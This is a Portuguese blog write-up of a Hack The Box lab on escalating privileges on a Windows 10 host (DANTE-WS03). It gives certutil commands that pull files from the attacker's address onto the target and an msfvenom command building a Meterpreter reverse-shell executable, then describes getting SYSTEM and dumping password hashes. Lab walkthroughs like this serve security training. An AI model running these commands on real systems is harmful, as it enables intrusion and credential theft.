HTB - LAB - Write Up - Privilege Escalation WIndows 10 (WS03)

Realizar a enumeração interna do servidor Owned é o primeiro passo da escalação de privilégio pois assim identificamos os pontos vulneráveis que permitem o acesso como root. 

A ferramenta WinPEAS é excelente para automatizar o processo de enumeração, que quando é feito de forma manual demanda muito tempo. O download do WinPEAS pode ser feito no github oficial da ferramenta AQUI

No servidor DANTE-WS03 é um Windows 10 e o download em ambientes Windows requer o uso de algumas ferramentas como Powershell ou Certutil. Nesse ponto, eu usei o Certutil localizado em C:\Windows\System32\ com o seguinte comando:

certutil -urlcache -split -f http://10.10.14.14/procdump64.exe C:\Users\blake\procdump64.exe


Ao executar a ferramenta, alguns pontos de exploração foram identificados mas não tinham todos os requisitos para realizar a escalação de privilégios. 

No entanto, eu já tinha acesso ao servidor através da shell reversa descrita neste artigo, logo eu poderia simplesmente gerar um executável com o MSFVenom e apontar a conexão reversa para o Meterpreter, onde com o comando getsystem eu posso ter acesso root no servidor. 

MSFVenom 

Comando para gerar o executável com o código da shell: 

msfvenom -a x64 windows/x64/meterpreter/reverse_tcp LHOST=[IP-VPN] LPORT=4545 -f exe > shell.exe

Lembrando que eu já tinha realizado a enumeração interna do servidor e sabia que a arquitetura era x64. 

Upload & Download do executável no Windows 

A ferramenta Certutil localizada em C:\Windows\System32 permite fazer do download do executável com o comando: 

certutil -urlcache -split -f http://10.10.14.14/shell.exe C:\Apache24\htdocs\user\images\shell.exe

O diretório local C:\Apache24\htdocs\user\images\ é onde tenho o acesso web através da listagem de diretório habilitada neste local. 


O arquivo é adicionado no diretório. 



Em seguida, basta executar o arquivo no servidor. 


A conexão reversa é estabelecida. 


Além de capturar a flag.txt no diretório do usuário Administrator, também é possível capturar os hashes das senhas em memória. 


Dessa forma, a escalação de privilégio é concluída e seu objetivo que é captura de senhas está completo. 






Comentários

Postagens mais visitadas